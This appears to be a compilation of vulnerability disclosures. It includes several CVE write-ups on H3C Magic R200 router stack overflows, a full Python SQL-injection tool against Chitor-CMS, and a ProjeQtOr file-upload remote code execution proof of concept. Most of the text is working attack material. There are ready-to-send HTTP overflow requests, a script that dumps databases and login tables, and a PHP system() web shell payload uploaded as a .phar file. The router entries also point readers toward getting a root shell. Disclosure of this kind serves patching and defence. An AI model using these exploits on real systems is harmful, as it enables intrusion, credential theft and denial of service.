H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. ## Vulnerability Details In function DeltriggerList,the size of local variable v7 is noly 16 bytes long.Parameters in the DeltriggerList interface use the getElement function to split strings(Var) and get items. !\[\](https://i.imgur.com/IJshUFq.png) !\[\](https://i.imgur.com/EJxYVPo.png) In line 28, the maximum size in the getElement function is limited to 64. When the length of input less than 64, the string will be copied into a1 by memcpy function. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/5jTOUfB.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 282 CMD=DeltriggerList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/71a3vWX.png) And you can write your own exp to get the root shell.

CVE-2023-29914: H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm. ## Vulnerability Details In function Edit\_BasicSSID\_5G, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v44 is 64 bytes long. in line 53, the content of Var is formatted into v44 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/m4O5A1I.png) !\[\](https://i.imgur.com/wCkUR3J.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 541 CMD=Edit\_BasicSSID\_5G&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/P2cIzcj.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

CVE-2023-29907: H3C Magic R200 was discovered stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm. ## Vulnerability Details In function SetAPWifiorLedInfoById, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v17 is 72 bytes long. in line 26, the content of Var is formatted into v17 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/NnWzUNq.png) !\[\](https://i.imgur.com/ht7j6Gs.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 544 CMD=SetAPWifiorLedInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/Ah3gEcu.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/nTphgnu.png) And you can write your own exp to get the root shell.

CVE-2023-29913: H3C Magic R200 was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetMobileAPInfoById interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the SetMobileAPInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetMobileAPInfoById interface at /goform/aspForm. ## Vulnerability Details In function SetMobileAPInfoById, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v18 is 72 bytes long. in line 27, the content of Var is formatted into v18 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/hX5CXwj.png) !\[\](https://i.imgur.com/IykSBzs.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 541 CMD=SetMobileAPInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/GxAXxkM.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

CVE-2023-29908: H3C Magic R200 was discovered stack overflow via the SetMobileAPInfoById interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm. ## Vulnerability Details In function AddWlanMacList, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v6 is 64 bytes long. in line 15, the content of Var is formatted into v6 without size check by sscanf function in the form of \`%u;%\[^;\];%\[^;\];\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/NUsnBeE.png) !\[\](https://i.imgur.com/dWLALwV.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 538 CMD=AddWlanMacList&param=1;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/ApoJ9Vf.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/BPob9bH.png) And you can write your own exp to get the root shell.

CVE-2023-29909: H3C Magic R200 was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the AddMacList interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the AddMacList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the AddMacList interface at /goform/aspForm. ## Vulnerability Details In function AddMacList, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v29 is 32 bytes long. in line 43, the content of Var is formatted into v29 without size check by sscanf function, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/rfOmmB3.png) !\[\](https://i.imgur.com/q3gkPjr.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 534 CMD=AddMacList&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/E3qpMW3.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/9kI7D9K.png) And you can write your own exp to get the root shell.

CVE-2023-29911: H3C Magic R200 was discovered stack overflow via the AddMacList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via CMD parameter at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via CMD parameter at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via CMD parameter at /goform/aspForm. ## Vulnerability Details The content obtained by the program through the CMD parameter is passed to v6, and then v6 is copied into \`&cmdBuff\`, the size of v6 is not checked, and there is a buffer overflow vulnerability. !\[\](https://i.imgur.com/klLZVPt.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 519 CMD=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/26TITvv.png) And you can write your own exp to get the root shell.

CVE-2023-29915: H3C Magic R200 was discovered stack overflow via CMD parameter at /goform/aspForm - HackMD

Chitor-CMS version 1.1.2 suffers from a remote SQL injection vulnerability.

    #!/usr/bin/python3########################################################                                                     # #  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          ##  Date: 2023/04/13               ##  ExploitAuthor: msd0pe                                  ##  Project: https://github.com/waqaskanju/Chitor-CMS  ##  My Github: https://github.com/msd0pe-1             ##  Patched the 2023/04/16: 69d3442 commit             ##                                                     ########################################################__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'__author__ = 'msd0pe'__version__ = '1.1'__date__ = '2023/04/13'class bcolors:    PURPLE = '\033[95m'    BLUE = '\033[94m'    GREEN = '\033[92m'    OCRA = '\033[93m'    RED = '\033[91m'    CYAN = '\033[96m'    ENDC = '\033[0m'    BOLD = '\033[1m'    UNDERLINE = '\033[4m'class infos:    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "import reimport requestsimport optparsefrom prettytable import PrettyTabledef DumpTable(url, database, table):    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}    x = PrettyTable()    columns = []    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                columns.append(i)                pass    except:        pass    x.field_names = columns    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                i = i.split("xzmdpl")                x.add_rows([i])    except ValueError:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                i = i.split("xzmdpl")                i.append("")                x.add_rows([i])            print(x)def ListTables(url, database):    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}    x = PrettyTable()    x.field_names = ["TABLES"]    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                x.add_row([i])    except:        pass    print(x)def ListDatabases(url):    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}    x = PrettyTable()    x.field_names = ["DATABASES"]    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                x.add_row([i])    except:        pass    print(x)def Main():    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')    (options, args) = Menu.parse_args()    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs                                                         python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables                                                         python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump    """)    Menu.add_option_group(Examples)    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:        Menu.print_help()        print('')        print('  %s' % __description__)        print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)        print('  Any malicious or illegal activity may be punishable by law')        print('  Use at your own risk')    elif len(args) == 0:        try:            if options.url != None:                if options.l_databases != None:                    ListDatabases(options.url)                if options.database != None:                    if options.l_tables != None:                        ListTables(options.url, options.database)                    if options.table != None:                        if options.dump != None:                            DumpTable(options.url, options.database, options.table)        except:            print("Unexpected error")if __name__ == '__main__':    try:        Main()    except KeyboardInterrupt:        print()        print(infos.PROCESS + "Exiting...")        print()        exit(1)

Chitor-CMS 1.1.2 SQL Injection

ProjeQtOr Project Management System version 10.3.2 suffers from a remote shell upload vulnerability.

Exploit Title: ProjeQtOr Project Management System 10.3.2   -Remote Code Execution (RCE)  
Application: ProjeQtOr Project Management System  
Version: 10.3.2  
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://www.projeqtor.org  
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download  
Date of found: 19.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again

Payload:<?php echo system("id"); ?>

poc request:

POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1  
Host: localhost  
Content-Length: 1177  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: application/json  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/projeqtor/view/main.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic  
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"  
Content-Type: application/octet-stream

<?php echo system("id"); ?>

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentId"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefType"

User  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefId"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentType"

file  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentLink"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
